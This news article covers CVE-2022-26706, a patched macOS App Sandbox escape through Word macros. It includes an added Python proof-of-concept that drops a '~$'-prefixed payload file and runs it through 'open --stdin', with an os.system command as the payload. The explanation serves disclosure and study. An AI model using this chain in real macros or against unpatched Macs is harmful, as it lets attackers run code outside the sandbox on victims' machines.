Hackers could use your Mac to exploit Microsoft Word security flaws
Microsoft has shed light on a flaw in macOS that, if exploited, could let threat actors run arbitrary code on a victim's Mac. The flaw, tracked as CVE-2022-26706, allows the macOS App Sandbox rules to be bypassed, so that malicious macros in Word documents can escape the sandbox rather than being contained by it.
For many years now, macros have been used by numerous threat actors to trick people into downloading malware or ransomware onto their endpoints. It has gotten to the point where Microsoft decided to block macros by default in files obtained from the internet and to make it quite hard for the average Word user to enable them.
Now, Microsoft is warning that the same approach works on macOS devices as well:
Executing arbitrary instructions
“Despite the security restrictions imposed by the App Sandbox’s rules on applications, it’s possible for attackers to bypass the said rules and let malicious codes “escape” the sandbox and execute arbitrary commands on an affected device,” the company explained.
The flaw was found by the Microsoft 365 Defender Research Team and was reportedly fixed by Apple on May 16.
App Sandbox is a technology built into macOS that manages app access control. As the name implies, its purpose is to contain any potential damage that a malicious application can do, and to protect sensitive data.
The problem begins with Word’s backward compatibility. To keep it working, the application is allowed to read or write files with a “~$” prefix (its long-standing temporary-file naming convention), even from inside the sandbox. By leveraging macOS’s Launch Services to run an “open --stdin” command on a specially crafted Python file with this prefix, the attacker can bypass the sandbox, Microsoft further explained.
This technique also lets threat actors bypass “built-in, baseline security features” in macOS, compromising both system and user data as a result.
Microsoft published a proof-of-concept whose code is so simple that one can just drop a Python file, with the aforementioned prefix, containing arbitrary commands.
“Python happily runs our code, and since it is a child process of launchd, it isn’t bound to Word’s sandbox rules,” Microsoft said.
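To make the two moving parts concrete, the following is an added illustration written for this page; it is not Microsoft’s proof-of-concept code nor anything from the article. It mirrors the chain the article describes: a file is dropped under the “~$” prefix that Word’s sandbox profile permits, and Launch Services (the `open` command) is asked to start Python with that file on stdin, so the interpreter runs as a child of launchd rather than of the sandboxed Word process. The `-a Python` argument (which application Launch Services should hand the file to), the `exploit.py` name and the payload contents are assumptions for the example; the article only says an `open --stdin` command is run on a “~$”-prefixed Python file. On anything other than macOS the `open` step is skipped, since only macOS has Launch Services.

```python
import os
import platform
import subprocess

# Word's sandbox profile carries a temporary exception that lets it read and
# write files whose names begin with "~$", its temporary-file convention kept
# for backward compatibility. That prefix is what makes the drop possible
# from inside the sandbox.
WORD_TEMP_PREFIX = "~$"

# Constructed payload for the example (assumption): whatever is here runs
# outside Word's sandbox once Launch Services hands it to Python.
PAYLOAD = "import os\nos.system('id > /tmp/sandbox_escape_demo.txt')\n"


def sandbox_allows_write(path):
    """Mirror the relevant sandbox rule: only '~$'-prefixed names are writable."""
    return os.path.basename(path).startswith(WORD_TEMP_PREFIX)


def drop_payload(directory, name="~$exploit.py"):
    """Write the payload the way the sandboxed Word process would be able to.

    A name without the "~$" prefix is refused here, modelling the sandbox
    denying the write; with the prefix, the file lands on disk.
    """
    path = os.path.join(directory, name)
    if not sandbox_allows_write(path):
        raise PermissionError("sandbox would deny write to %s" % path)
    with open(path, "w") as f:
        f.write(PAYLOAD)
    return path


def launch_command(path, app="Python"):
    """Build the Launch Services invocation (the 'open --stdin' step).

    `open --stdin=<file> -a <app>` asks Launch Services, not Word, to start
    <app> with <file> connected to its standard input. The new process is a
    child of launchd, so Word's sandbox rules never apply to it.
    """
    return ["open", "--stdin=%s" % path, "-a", app]


def run_poc(directory):
    """Drop the file, then hand it to Launch Services on macOS only."""
    path = drop_payload(directory)
    cmd = launch_command(path)
    if platform.system() == "Darwin":
        # On a patched macOS (Apple's May 16 fix) this no longer escapes
        # the sandbox; on an unpatched one, Python runs PAYLOAD unconfined.
        subprocess.run(cmd, check=True)
    return cmd


if __name__ == "__main__":
    import tempfile
    print(run_poc(tempfile.mkdtemp()))
```

The two checks a practitioner cares about are visible in the helpers: `sandbox_allows_write` shows why the prefix matters (a plain `exploit.py` would be blocked, `~$exploit.py` is not), and `launch_command` shows that the escape is not a bug in Python at all but in who the parent process is. From a real Word macro the same command would be issued through the macro’s shell-execution facility rather than Python’s `subprocess`.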
Via: BleepingComputer